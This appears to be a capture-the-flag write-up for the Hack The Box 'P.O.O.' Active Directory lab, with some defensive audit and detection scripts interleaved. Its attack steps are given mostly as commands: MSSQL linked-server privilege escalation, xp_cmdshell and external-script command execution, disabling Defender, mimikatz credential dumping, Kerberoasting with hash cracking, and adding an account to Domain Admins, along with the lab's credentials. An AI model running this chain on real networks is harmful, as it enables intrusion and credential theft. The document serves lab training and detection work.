
# P.O.O.


### **Introduction**

**Professional Offensive Operations**

By [eks](https://app.hackthebox.com/home/users/profile/302) and [mrb3n](https://app.hackthebox.com/home/users/profile/2984)

Professional Offensive Operations is a rising name in the cyber security world.

Lately they've been working on migrating core services and components to a state-of-the-art cluster which offers cutting-edge software and hardware.

P.O.O. is designed to put your skills in enumeration, lateral movement, and privilege escalation to the test within a small Active Directory environment that is configured with the latest operating systems and technologies.

The goal is to compromise the perimeter host, escalate privileges and ultimately compromise the domain while collecting several flags along the way.

Entry Point: `10.13.38.11`

***

## Enumeration

```
ping -c 1 10.13.38.11 -R
```

<div align="left"><figure><img src="/files/zdibUHgaunvic3N0u1RM" alt=""><figcaption></figcaption></figure></div>

### NMAP Scans

```
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.13.38.11 -oG allPorts
```

<figure><img src="/files/nvLJb98CVZBA9sJCcAuG" alt=""><figcaption></figcaption></figure>

```
nmap -p80,1433 -sCV 10.13.38.11 -oN targeted
```

```bash
# Nmap 7.94SVN scan initiated Fri Mar 29 18:18:25 2024 as: nmap -p80,1433 -sCV -oN targeted 10.13.38.11
Nmap scan report for 10.13.38.11
Host is up (0.26s latency).

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open  ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+
|_ssl-date: 2024-03-29T22:18:45+00:00; +4s from scanner time.
| ms-sql-ntlm-info: 
|   10.13.38.11:1433: 
|     Target_Name: POO
|     NetBIOS_Domain_Name: POO
|     NetBIOS_Computer_Name: COMPATIBILITY
|     DNS_Domain_Name: intranet.poo
|     DNS_Computer_Name: COMPATIBILITY.intranet.poo
|     DNS_Tree_Name: intranet.poo
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-03-29T19:52:54
|_Not valid after:  2054-03-29T19:52:54
| ms-sql-info: 
|   10.13.38.11:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM+
|       number: 14.00.2027.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: true
|_    TCP port: 1433
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 3s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 29 18:18:41 2024 -- 1 IP address (1 host up) scanned in 16.08 seconds
```

### Bruteforce Directories

```
dirsearch -u 10.13.38.11
```

<figure><img src="/files/dzQ4g9DaXltNU2QsF6wY" alt=""><figcaption></figcaption></figure>

### DS Enumeration Directory

{% embed url="https://github.com/Keramas/DS_Walk" %}
DS_Walk Repository
{% endembed %}

```
python ds_walk.py -u http://10.13.38.11
```

{% code title="Output of ds_walk.py" %}

```bash
[!] .ds_store file is present on the webserver.
[+] Enumerating directories based on .ds_server file:
----------------------------
[!] http://10.13.38.11/admin
[!] http://10.13.38.11/dev
[!] http://10.13.38.11/iisstart.htm
[!] http://10.13.38.11/Images
[!] http://10.13.38.11/JS
[!] http://10.13.38.11/META-INF
[!] http://10.13.38.11/New folder
[!] http://10.13.38.11/New folder (2)
[!] http://10.13.38.11/Plugins
[!] http://10.13.38.11/Templates
[!] http://10.13.38.11/Themes
[!] http://10.13.38.11/Uploads
[!] http://10.13.38.11/web.config
[!] http://10.13.38.11/Widgets
----------------------------
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc
----------------------------
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/core
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/include
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/src
----------------------------
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/core
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/include
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/src
----------------------------
[!] http://10.13.38.11/Images/buttons
[!] http://10.13.38.11/Images/icons
[!] http://10.13.38.11/Images/iisstart.png
----------------------------
[!] http://10.13.38.11/JS/custom
----------------------------
[!] http://10.13.38.11/Themes/default
----------------------------
[!] http://10.13.38.11/Widgets/CalendarEvents
[!] http://10.13.38.11/Widgets/Framework
[!] http://10.13.38.11/Widgets/Menu
[!] http://10.13.38.11/Widgets/Notifications
----------------------------
[!] http://10.13.38.11/Widgets/Framework/Layouts
----------------------------
[!] http://10.13.38.11/Widgets/Framework/Layouts/custom
[!] http://10.13.38.11/Widgets/Framework/Layouts/default
----------------------------
[*] Finished traversing. No remaining .ds_store files present.
[*] Cleaning up .ds_store files saved to disk.

```

{% endcode %}

### IIS Shortname Scanner

{% embed url="https://github.com/lijiejie/IIS_shortname_Scanner" %}

```
python3 iis_shortname_scanner.py http://10.13.38.11/
python3 iis_shortname_scanner.py http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/
python3 iis_shortname_scanner.py http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/
```

<figure><img src="/files/YnOgShYVnHjTSYPKfE82" alt=""><figcaption></figcaption></figure>

```
poo_co~1.txt
_co%%%% 
```

### Path bruteforce with WFUZZ

```bash
grep "^co" /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt > co_fuzz.txt 
wc -l co_fuzz.txt
wfuzz -c -w co_fuzz.txt -u http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_FUZZ.txt --hc 404
curl 10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_connection.txt
```

<figure><img src="/files/ISXshbcXDWjGtFnGzULW" alt=""><figcaption></figcaption></figure>

### MSSQL Enumeration / Linkcrawler

```bash
msfconsole
search mssql
use auxiliary/admin/mssql/mssql_enum
show options
set PASSWORD #p00Public3xt3rnalUs3r#
set USERNAME external_user
set RHOST 10.13.38.11
run
```

```bash
search mssql
use exploit/windows/mssql/mssql_linkcrawler
show options
set PASSWORD #p00Public3xt3rnalUs3r#
set USERNAME external_user
set RHOST 10.13.38.11
```

<figure><img src="/files/W5JIjEVKp42NP5ikuyC5" alt=""><figcaption></figcaption></figure>

### Installing USQL for client to MSSQL

```
go install -tags most github.com/xo/usql@latest
usql 
\c mssql://external_user@10.13.38.11:1433
#p00Public3xt3rnalUs3r#

```

<figure><img src="/files/rpGzYzOKGHbc1nygVbr6" alt=""><figcaption></figcaption></figure>

### MSSQL Enumeration

```sql
SELECT name FROM sys.databases;
```

<div align="left"><figure><img src="/files/IlAkb1meLEf7wZELaVKo" alt=""><figcaption></figcaption></figure></div>

```sql
SELECT suser_name(); 
SELECT name,sysadmin FROM syslogins;
SELECT srvname, isremote FROM sysservers;
```

<figure><img src="/files/E4z5fGPQU1UdiZJHGa5M" alt=""><figcaption></figcaption></figure>

```sql
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select current_user');
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select name,sysadmin from syslogins');
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select srvname,isremote from sysservers');
```

<figure><img src="/files/sqVhE2TLs7UeUOgucQoO" alt=""><figcaption></figcaption></figure>

```sql
SELECT * FROM OPENQUERY([COMPATIBILITY\POO_CONFIG], 'EXECUTE(''SELECT * FROM OPENQUERY([COMPATIBILITY\POO_PUBLIC], ''''SELECT SUSER_NAME();'''');'')');
SELECT * FROM OPENQUERY([COMPATIBILITY\POO_CONFIG], 'SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');');
```

```sql
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select * from openquery("COMPATIBILITY\POO_PUBLIC", ''select name from master.dbo.sysdatabases'')');
```
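The queries above expose the linked-server loop that the rest of the write-up relies on: a login that is not sysadmin on POO_PUBLIC can reach POO_CONFIG, and POO_CONFIG links back to POO_PUBLIC under a privileged login. The Python below is an added example, not part of the original write-up or of any tool it uses: it models an inventory of linked servers (the kind of data a DBA exports from sys.servers and sys.linked_logins) and walks it for chains that end on a sysadmin remote login, which is the audit that finds such loops before an attacker does. The instance names come from the write-up; the remote login names and the sysadmin flags are constructed assumptions.

```python
from collections import deque

# Constructed inventory modelling the linked-server layout the enumeration above
# revealed (a POO_PUBLIC -> POO_CONFIG -> POO_PUBLIC loop). The remote login
# names and sysadmin flags are assumptions for the example; the lab's real
# mappings are not shown on the page.
# Each tuple: (local instance, linked server, remote login used, remote login is sysadmin)
LINKS = [
    ("COMPATIBILITY\\POO_PUBLIC", "COMPATIBILITY\\POO_CONFIG", "config_link_user", False),
    ("COMPATIBILITY\\POO_CONFIG", "COMPATIBILITY\\POO_PUBLIC", "sa", True),
]


def build_graph(links):
    """Index outgoing links by local instance."""
    graph = {}
    for src, dst, login, is_sysadmin in links:
        graph.setdefault(src, []).append((dst, login, is_sysadmin))
    return graph


def find_escalation_paths(links, start, start_is_sysadmin=False, max_depth=6):
    """Breadth-first walk of the link graph from `start`.

    Returns every chain of hops (src, dst, remote_login) whose final hop lands on
    a remote login that is sysadmin, i.e. a place where a caller who is not
    sysadmin locally gains sysadmin on the far side. Each distinct hop may be
    used at most once per chain, so loopback links are found without the walk
    cycling forever.
    """
    if start_is_sysadmin:
        return []  # nothing to escalate: the caller is already sysadmin
    graph = build_graph(links)
    found = []
    queue = deque([(start, [])])
    while queue:
        node, path = queue.popleft()
        if len(path) >= max_depth:
            continue
        for dst, login, is_sysadmin in graph.get(node, []):
            hop = (node, dst, login)
            chain = path + [hop]
            if is_sysadmin:
                found.append(chain)
            if chain.count(hop) == 1:
                queue.append((dst, chain))
    return found


def is_loopback(chain, start):
    """True when the chain ends back on the instance it started from."""
    return chain[-1][1] == start


def describe(chain, start):
    """Render a chain as 'A -> B (as login) -> C (as login) [loops back to start]'."""
    text = chain[0][0]
    for _src, dst, login in chain:
        text += f" -> {dst} (as {login})"
    if is_loopback(chain, start):
        text += " [loops back to start]"
    return text


if __name__ == "__main__":
    origin = "COMPATIBILITY\\POO_PUBLIC"
    for chain in find_escalation_paths(LINKS, origin):
        print(describe(chain, origin))
```

The remediation the output points at is configuration rather than code: map the link to a least-privilege remote login instead of sa, and disable RPC Out on links that do not need it so `EXECUTE ... AT` cannot be pushed through them.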

## Adding Username to the DB

```sql
EXECUTE('EXECUTE(''EXEC master..sp_addlogin ''''3ky'''', ''''3ky123!'''''') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
```

```sql
EXECUTE('EXECUTE(''EXEC master..sp_addsrvrolemember ''''3ky'''',''''sysadmin'''''') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
```

### Check Username

```bash
msfconsole
search mssql
use auxiliary/admin/mssql/mssql_enum
show options
set PASSWORD 3ky123!
set USERNAME 3ky
set RHOST 10.13.38.11
run
```

### XP\_cmdshell

```sql
sqlcmd -S 10.13.38.11 -U 3ky -P 3ky123!
xp_cmdshell 'whoami';
go
```

### Enabling external scripts

```sql
EXEC sp_configure 'external scripts enabled', 1
reconfigure
go
```

### Using external scripts (example)

```sql
EXEC sp_execute_external_script
@language = N'Python',
@script = N'import os; os.system("whoami")'
go
```
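Both of the preceding sections switch an instance-wide option with sp_configure, and SQL Server writes every such change to its ERRORLOG (and to the Windows Application log as MSSQLSERVER event 15457). The Python below is an added example, not from the write-up: it parses a constructed ERRORLOG excerpt and flags the high-risk options being switched from 0 to 1, ignoring disables and ordinary tuning so the result can feed an alert directly. The log lines are constructed for the example; the message text follows the format SQL Server emits for sp_configure changes.

```python
import re

# Constructed SQL Server ERRORLOG excerpt for this example (not output from the
# lab). Every sp_configure change writes a line of this shape to the ERRORLOG
# and raises Application-log event 15457 with the same text.
SAMPLE_ERRORLOG = """\
2024-03-29 18:20:01.23 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-29 18:20:01.25 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-29 18:21:14.02 spid51      Configuration option 'external scripts enabled' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-29 18:25:00.10 spid55      Configuration option 'max server memory (MB)' changed from 2147483647 to 8192. Run the RECONFIGURE statement to install.
2024-03-29 19:00:00.00 spid60      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

# Options that give whoever can run sp_configure a route to OS-level code execution.
HIGH_RISK_OPTIONS = {
    "xp_cmdshell",
    "external scripts enabled",
    "Ole Automation Procedures",
    "clr enabled",
}

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)


def parse_config_changes(text):
    """Extract (timestamp, spid, option, old, new) from sp_configure change lines."""
    changes = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            changes.append((m["ts"], m["spid"], m["option"], int(m["old"]), int(m["new"])))
    return changes


def find_dangerous_enables(text):
    """Return the subset of changes that switch a high-risk option from 0 to 1.

    A disable (1 -> 0) is not flagged, and unrelated tuning such as memory limits
    is ignored, so the output stays short enough to alert on directly.
    """
    return [
        (ts, spid, option)
        for ts, spid, option, old, new in parse_config_changes(text)
        if option in HIGH_RISK_OPTIONS and old == 0 and new == 1
    ]


if __name__ == "__main__":
    for ts, spid, option in find_dangerous_enables(SAMPLE_ERRORLOG):
        print(f"{ts} {spid}: '{option}' enabled")
```

The 'show advanced options' line that precedes the two flagged entries is a useful secondary signal: it is required before either option can be set, so a burst of the three within seconds from one spid is the pattern to correlate on.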

### Reading web.config to extract the administrator credentials

```sql
EXEC sp_execute_external_script
@language = N'Python',
@script = N'import os; os.system("type C:\\inetpub\\wwwroot\\web.config")'
go
```

<figure><img src="/files/Y1VpsEWvCNywM9mTxkg2" alt=""><figcaption></figcaption></figure>

<div align="left"><figure><img src="/files/LAzi2g0O2nfzUSeVY0M1" alt=""><figcaption></figcaption></figure></div>
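The write-up reaches the administrator password by reading web.config from disk, and earlier it mapped the whole site from a leftover .DS_Store. The Python below is an added example, not the write-up's code: it audits a webroot for both problems, leaky metadata files anywhere in the tree and credentials stored in web.config sections that have not been encrypted with a protected-configuration provider (the form `aspnet_regiis -pe` produces, recognisable by the `configProtectionProvider` attribute). The web.config contents and the temporary directory layout are constructed for the example, with placeholder credentials.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Artefacts that disclose directory structure or secrets when left in a webroot.
LEAKY_NAMES = {".DS_Store", "Thumbs.db", ".git", ".svn", ".env"}

# Constructed web.config for this example (the lab's real file is not
# reproduced; every credential value is a placeholder).
PLAINTEXT_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <connectionStrings>
    <add name="IntranetDb"
         connectionString="Server=COMPATIBILITY\\POO_PUBLIC;User Id=PLACEHOLDER_USER;Password=PLACEHOLDER_PASSWORD;" />
  </connectionStrings>
  <appSettings>
    <add key="AdminPassword" value="PLACEHOLDER_PASSWORD" />
    <add key="SiteTitle" value="Intranet" />
  </appSettings>
</configuration>
"""

# The same file after protecting both sections with aspnet_regiis -pe: the
# section element carries configProtectionProvider and only ciphertext remains.
ENCRYPTED_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <connectionStrings configProtectionProvider="RsaProtectedConfigurationProvider">
    <EncryptedData>PLACEHOLDER_CIPHERTEXT</EncryptedData>
  </connectionStrings>
  <appSettings configProtectionProvider="RsaProtectedConfigurationProvider">
    <EncryptedData>PLACEHOLDER_CIPHERTEXT</EncryptedData>
  </appSettings>
</configuration>
"""

SECRET_KEY_HINTS = ("password", "pwd", "secret", "token", "apikey")


def audit_web_config(xml_text):
    """Return findings for credentials stored unprotected in web.config."""
    findings = []
    root = ET.fromstring(xml_text)
    for section in ("connectionStrings", "appSettings"):
        node = root.find(section)
        if node is None or node.get("configProtectionProvider"):
            continue  # absent, or encrypted by a protected-configuration provider
        for add in node.findall("add"):
            if section == "connectionStrings" and "password=" in add.get("connectionString", "").lower():
                findings.append(f"connectionStrings/{add.get('name')}: plaintext password")
            key = add.get("key", "")
            if section == "appSettings" and any(h in key.lower() for h in SECRET_KEY_HINTS):
                findings.append(f"appSettings/{key}: looks like an unprotected secret")
    return findings


def scan_webroot(root_dir):
    """Walk a webroot; report leaky artefacts and unprotected web.config secrets."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root_dir):
        rel = os.path.relpath(dirpath, root_dir)
        for name in dirnames + filenames:
            if name in LEAKY_NAMES:
                findings.append(f"{os.path.join(rel, name)}: leaky artefact, remove before publishing")
            if name.lower() == "web.config":
                with open(os.path.join(dirpath, name), encoding="utf-8") as fh:
                    for finding in audit_web_config(fh.read()):
                        findings.append(f"{os.path.join(rel, name)}: {finding}")
    return findings


def build_sample_webroot():
    """Create a throwaway directory tree that mimics the leaky layout above."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "dev", "db"))
    for sub in ("", "dev"):
        with open(os.path.join(root, sub, ".DS_Store"), "wb") as fh:
            fh.write(b"\x00\x00\x00\x01Bud1")  # constructed: magic bytes only, not a real file
    with open(os.path.join(root, "web.config"), "w", encoding="utf-8") as fh:
        fh.write(PLAINTEXT_WEB_CONFIG)
    return root


if __name__ == "__main__":
    for line in scan_webroot(build_sample_webroot()):
        print(line)
```

Run it against the deployment staging directory rather than the live server: the point is to catch the .DS_Store and the plaintext web.config before they are published, and IIS request filtering (hidden segments) is the second layer for anything that slips through.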

```sql
EXEC sp_execute_external_script
@language = N'Python',
@script = N'import os; os.system("netstat -ano")'
go
```

<figure><img src="/files/qrxP6NEk4GJCFvI3yGQz" alt=""><figcaption></figcaption></figure>

<div align="left"><figure><img src="/files/7XlCVpqShiXOMF431HHY" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="/files/eleirZketm9YrinIMs5s" alt=""><figcaption></figcaption></figure></div>

```bash
echo "dead:beef::1001 compatibility.htb" | sudo tee -a /etc/hosts
```

### Evil-WinRM

```
evil-winrm -i compatibility.htb -u Administrator -p "EverybodyWantsToWorkAtP.O.O."
```

<figure><img src="/files/36FBKjB9vQIQRdf5Y7hv" alt=""><figcaption></figcaption></figure>

```batch
net user administrator
```

<figure><img src="/files/jwkxMsBg4tzO06v4Jfe3" alt=""><figcaption></figcaption></figure>

```powershell
Set-MpPreference -DisableRealtimeMonitoring $true
```

### Mimikatz.exe

{% embed url="https://github.com/ParrotSec/mimikatz/blob/master/x64/mimikatz.exe" %}

<div align="left"><figure><img src="/files/4xVo0eGvgLqmtU9gCfLm" alt=""><figcaption></figcaption></figure></div>

```powershell
.\mimikatz.exe token::elevate lsadump::cache exit
```

<figure><img src="/files/jbU3WIunrmfiwQmwyalT" alt=""><figcaption></figcaption></figure>

### Invoke-Kerberoast.ps1

{% embed url="https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1" %}

<figure><img src="/files/gMXOcPV1YVnPV93RcMuy" alt=""><figcaption></figcaption></figure>

```sql
sqlcmd -S 10.13.38.11 -U 3ky -P 3ky123!
xp_cmdshell 'powershell -exec bypass -c "import-module C:\temp\invoke-kerberoast.ps1; invoke-kerberoast -outputformat hashcat | fl"'
go
```

{% code overflow="wrap" %}

```
$krb5tgs$23$*p00_adm$intranet.poo$cyber_audit/intranet.poo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
```

{% endcode %}

{% code overflow="wrap" %}

```bash
hashcat -a0 -m 13100 hash.txt /usr/share/wordlists/seclists/Passwords/Keyboard-Combinations.txt
```

{% endcode %}

<figure><img src="/files/ZQALg7TNP9lmzyjnbQK9" alt=""><figcaption></figcaption></figure>

```
ZQ!5t4r
```

### Sharphound

{% embed url="https://github.com/BloodHoundAD/SharpHound" %}

<figure><img src="/files/bEEKCCb0ZNkHWGlASd9o" alt=""><figcaption></figcaption></figure>

```
sqlcmd -S 10.13.38.11 -U 3ky -P 3ky123!
xp_cmdshell 'cd C:\temp && SharpHound.exe -c all'
go
```

### PowerView.ps1

{% embed url="https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerView/powerview.ps1" %}

{% code overflow="wrap" %}

```bash
evil-winrm -i compatibility.htb -u Administrator -p "EverybodyWantsToWorkAtP.O.O." -s .
```

{% endcode %}

<figure><img src="/files/RhuYRCTN4kQIzZpBfYqo" alt=""><figcaption></figcaption></figure>

```powershell
$user = 'intranet.poo\p00_adm'
$pass = ConvertTo-SecureString 'ZQ!5t4r' -AsPlainText -Force
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user,$pass
Add-DomainGroupMember -Identity "Domain Admins" -Members "p00_adm" -Credential $cred

# Equivalent shorter form
$pass = ConvertTo-SecureString 'ZQ!5t4r' -AsPlainText -Force
$cred = New-Object -TypeName System.Management.Automation.PSCredential('intranet.poo\p00_adm', $pass)
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'p00_adm' -Credential $cred
```
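Two of the later steps leave distinct traces in the domain controller's Security log: the Kerberoast request for p00_adm's SPN is a 4769 service-ticket request with RC4 encryption (type 0x17) for a user-owned SPN, and Add-DomainGroupMember produces a 4728 (member added to a security-enabled global group) event naming Domain Admins. The Python below is an added example, not part of the write-up, that runs both detections over constructed event records; the requesting accounts, IP addresses and distinguished names are invented for the example, and only p00_adm, Domain Admins and the intranet.poo domain come from the page.

```python
from collections import defaultdict

# Groups whose membership changes should always raise an alert.
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins", "Administrators"}
RC4_HMAC = "0x17"  # TicketEncryptionType for RC4, the type Kerberoasting tooling requests

# Constructed Security-log records as dicts keyed by the event's XML field names.
# Values are invented for this example; only the SPN owner (p00_adm), the group
# name and the domain come from the write-up above.
EVENTS = [
    {"EventID": 4769, "TargetUserName": "svc_web@INTRANET.POO", "ServiceName": "p00_adm",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.13.38.11"},
    {"EventID": 4769, "TargetUserName": "svc_web@INTRANET.POO", "ServiceName": "COMPATIBILITY$",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.13.38.11"},
    {"EventID": 4769, "TargetUserName": "alice@INTRANET.POO", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.13.38.20"},
    {"EventID": 4728, "SubjectUserName": "p00_adm", "TargetUserName": "Domain Admins",
     "MemberName": "CN=p00_adm,CN=Users,DC=intranet,DC=poo"},
    {"EventID": 4728, "SubjectUserName": "helpdesk1", "TargetUserName": "Sales",
     "MemberName": "CN=bob,CN=Users,DC=intranet,DC=poo"},
]


def kerberoast_candidates(events):
    """Group successful RC4 service-ticket requests for user-owned SPNs by requester.

    Computer accounts (names ending in $) and krbtgt are excluded: Kerberoasting
    targets user accounts with an SPN because their passwords are human-chosen
    and the RC4 ticket can be cracked offline.
    """
    by_requester = defaultdict(list)
    for e in events:
        if e.get("EventID") != 4769 or e.get("Status") != "0x0":
            continue
        svc = e.get("ServiceName", "")
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        if e.get("TicketEncryptionType") == RC4_HMAC:
            by_requester[e["TargetUserName"]].append(svc)
    return dict(by_requester)


def privileged_group_changes(events):
    """Return (actor, member, group) for additions to privileged groups.

    4728 covers global groups, 4732 local groups and 4756 universal groups, so
    Domain Admins (global) and the built-in Administrators (local) are both seen.
    """
    hits = []
    for e in events:
        if e.get("EventID") in (4728, 4732, 4756) and e.get("TargetUserName") in PRIVILEGED_GROUPS:
            hits.append((e["SubjectUserName"], e["MemberName"], e["TargetUserName"]))
    return hits


if __name__ == "__main__":
    for requester, services in kerberoast_candidates(EVENTS).items():
        print(f"RC4 service tickets requested by {requester}: {services}")
    for actor, member, group in privileged_group_changes(EVENTS):
        print(f"{actor} added {member} to {group}")
```

The Kerberoast check only works as a signal if RC4 is unusual in the environment: restricting service accounts to AES via msDS-SupportedEncryptionTypes makes any 0x17 request stand out, and moving SPNs to group managed service accounts (or long random passwords) removes what the cracking step in the write-up depends on.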

<figure><img src="/files/BPrQnpsfYwm7NivukZgF" alt=""><figcaption></figcaption></figure>

